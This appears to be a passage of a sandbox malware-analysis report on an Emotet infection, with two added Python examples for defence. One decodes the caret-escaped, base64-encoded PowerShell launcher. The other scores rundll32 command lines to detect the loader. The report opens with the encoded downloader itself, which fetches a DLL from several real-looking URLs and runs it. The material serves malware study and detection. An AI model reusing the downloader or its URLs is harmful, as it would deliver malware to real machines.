KAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA
7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAA
vACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
                                          Imagebase:0x4aa60000
                                          File size:345088 bytes
                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
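The cmd.exe command line above stacks two layers of obfuscation: caret escapes, which cmd.exe strips before execution (so p^owe^rs^he^ll^ runs powershell), and an -enc argument that PowerShell decodes as base64 of UTF-16LE text. Its first command is only a decoy that pops a fake "Word experienced an error" dialog through msg.exe (the msg.exe block below shows the expanded form); the chained second command is the hidden PowerShell downloader. The Python below is an added example, not part of the report, that undoes both layers. The command line is copied from the block above with the -enc blob truncated to its first 232 characters so the sample stays short; the environment map passed to analyse is an assumption chosen to reproduce the "msg user" line the sandbox recorded.

```python
"""De-obfuscate the cmd.exe launcher from the process block above (added example, not from the report)."""
import base64
import re

# The recorded command line, with the -enc blob cut to its first 232 characters
# (the rest of the blob decodes the same way; it is just long).
CMDLINE = (
    "cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. "
    "& p^owe^rs^he^ll^ -w hi^dd^en -^e^nc "
    "UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMA"
    "fQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcA"
    "cwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAA"
)


def strip_carets(s: str) -> str:
    """Undo cmd.exe escaping: '^' makes the next character literal, so 'p^ower^ ' becomes 'power '."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def expand_env(s: str, env: dict) -> str:
    """Expand %VAR% the way cmd.exe does, leaving unknown variables untouched."""
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), s)


def decode_encoded_command(ps_cmd: str) -> str:
    """Decode PowerShell's -EncodedCommand (-e, -ec, -enc are the usual spellings): base64 of UTF-16LE."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", ps_cmd, re.IGNORECASE)
    if not m:
        raise ValueError("no -EncodedCommand argument")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def analyse(cmdline: str, env: dict) -> dict:
    """Split the launcher into its chained commands and decode the PowerShell stage."""
    plain = expand_env(strip_carets(cmdline), env)
    # Crude split on '&': good enough here, but an '&' inside quotes would need a real tokenizer.
    commands = [c.strip() for c in plain.split("&") if c.strip()]
    decoded = None
    for cmd in commands:
        if re.search(r"\bpowershell(\.exe)?\b", cmd, re.IGNORECASE):
            decoded = decode_encoded_command(cmd)
    return {"commands": commands, "decoded_powershell": decoded}
```

Run as written, analyse(CMDLINE, {"username": "user"}) returns the decoy "cmd cmd /c msg user /v Word experienced an error trying to open the file." as its first command and, for the PowerShell stage, the script's opening statement SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; which assembles the type name System.IO.Directory from shuffled fragments with a format string. The same trick recurs through the rest of the blob, which is why the report could recover the download URLs and the drop path C:\Users\user\Kaktksw\An6othh\N49I.dll from the decoded text.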

                                          General

                                          Start time:13:32:42
                                          Start date:26/01/2021
                                          Path:C:\Windows\System32\msg.exe
                                          Wow64 process (32bit):false
                                          Commandline:msg user /v Word experienced an error trying to open the file.
                                          Imagebase:0xff9f0000
                                          File size:26112 bytes
                                          MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:13:32:43
                                          Start date:26/01/2021
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell -w hidden -enc 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
                                          Imagebase:0x13f940000
                                          File size:473600 bytes
                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:high

                                          General

                                          Start time:13:32:48
                                          Start date:26/01/2021
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                                          Imagebase:0xff5f0000
                                          File size:45568 bytes
                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:13:32:48
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2107162967.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2106916506.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2106771774.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:32:49
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2109055699.0000000000710000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108942082.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:32:50
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2111700747.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2111875145.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2112057590.0000000000340000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:32:51
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2113404333.00000000003C0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:32:52
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2116039169.0000000000170000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2116715619.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:32:53
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2120498924.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2120569228.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:32:54
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2124089879.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2124035115.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2124200175.0000000000760000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:32:56
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2125021450.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2125095238.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2124826552.0000000000170000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:32:58
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2126847598.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2126913357.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2127036397.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:32:59
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2350246723.00000000007D0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2350021887.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2349984443.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
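
The rundll32.exe records above show the loader pattern the report's "Suspicious Call by Ordinal" signature keys on: the dropped DLL is first invoked by ordinal (`,#1`) from the user profile, then copied under a random folder in C:\Windows\SysWOW64 with a non-.dll extension and invoked again, once by a random export name and once by ordinal. The following is an added detection example, not part of the Joe Sandbox report or its Sigma rules: it parses rundll32 command lines and scores those indicators. The four report command lines are copied from the records above; the two benign lines, the indicator weights and the threshold are assumptions chosen for illustration.

```python
"""Score rundll32 command lines for the Emotet loader pattern seen in this report.

Added example (not Joe Sandbox code). Indicator weights and the threshold are
assumptions; tune them against your own telemetry before deploying.
"""
import ntpath
import re

# Copied from the rundll32.exe process records in this report.
REPORT_CMDLINES = [
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG",
]

# Constructed benign lines for contrast (not taken from the report).
BENIGN_CMDLINES = [
    r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL hotplug.dll',
    r"C:\Windows\System32\rundll32.exe shell32.dll,#61",
]

# rundll32 syntax: <rundll32 path> <module>,<entry> [args]. Joe Sandbox renders the
# quotes around the module as single quotes, so both quote styles are accepted.
_CMD_RE = re.compile(
    r"""
    ^\s*"?(?P<exe>[^"]*?rundll32(?:\.exe)?)"?     # rundll32 binary, optionally double-quoted
    \s+
    (?:'(?P<qmod1>[^']+)'                          # module path, single-quoted
      |"(?P<qmod2>[^"]+)"                          # ... or double-quoted
      |(?P<mod>[^,\s]+))                           # ... or bare (no spaces)
    \s*,\s*(?P<entry>\S+)                          # export name or ordinal after the comma
    """,
    re.IGNORECASE | re.VERBOSE,
)
ORDINAL_RE = re.compile(r"^#\d+$")
USER_DIR_RE = re.compile(r"^[a-z]:\\users\\", re.IGNORECASE)
# A directory *between* System32/SysWOW64 and the module, as in SysWOW64\Kvmkgtcj\aykivov.nhj.
# Legitimate nested components exist (DriverStore, spool, ...); allow-list them in production.
NESTED_SYSTEM_RE = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\[^\\]+\\", re.IGNORECASE)

# Extensions rundll32 is ordinarily handed; Emotet used .nhj/.jab/.qgs/.hhh here.
LOADER_EXTENSIONS = {".dll", ".ocx", ".cpl", ".ax"}

# Assumed weights: an ordinal call alone has legitimate uses, so it cannot fire by itself.
WEIGHTS = {
    "ordinal_export": 1,
    "non_dll_extension": 2,
    "user_profile_module": 2,
    "nested_system_subdir": 2,
}
SUSPICIOUS_THRESHOLD = 2


def parse_rundll32(cmdline):
    """Return (module_path, entry) for a rundll32 command line, or None if it is not one."""
    m = _CMD_RE.match(cmdline)
    if not m:
        return None
    module = m.group("qmod1") or m.group("qmod2") or m.group("mod")
    return module, m.group("entry")


def indicators(cmdline):
    """List the indicator names that match the command line, in a fixed order."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    module, entry = parsed
    hits = []
    if ORDINAL_RE.match(entry):
        hits.append("ordinal_export")
    if ntpath.splitext(module)[1].lower() not in LOADER_EXTENSIONS:
        hits.append("non_dll_extension")
    if USER_DIR_RE.match(module):
        hits.append("user_profile_module")
    if NESTED_SYSTEM_RE.match(module):
        hits.append("nested_system_subdir")
    return hits


def score(cmdline):
    return sum(WEIGHTS[h] for h in indicators(cmdline))


def is_suspicious(cmdline):
    return score(cmdline) >= SUSPICIOUS_THRESHOLD


def triage(cmdlines):
    """Map each command line to (score, indicators) for review."""
    return {c: (score(c), indicators(c)) for c in cmdlines}


if __name__ == "__main__":
    for line, (s, hits) in triage(REPORT_CMDLINES + BENIGN_CMDLINES).items():
        flag = "SUSPICIOUS" if s >= SUSPICIOUS_THRESHOLD else "ok"
        print(f"{flag:10} score={s} {hits} :: {line}")
```

Every report line scores at least 3, while the constructed `shell32.dll,#61` line scores only 1: the ordinal call on its own is not enough, which is why the weight on it is low and the file location and extension carry the decision. When wiring this into a SIEM, feed it the process creation event's command line (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) and keep the allow-list for nested system directories separate from the scoring.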

                                          Disassembly

                                          Code Analysis
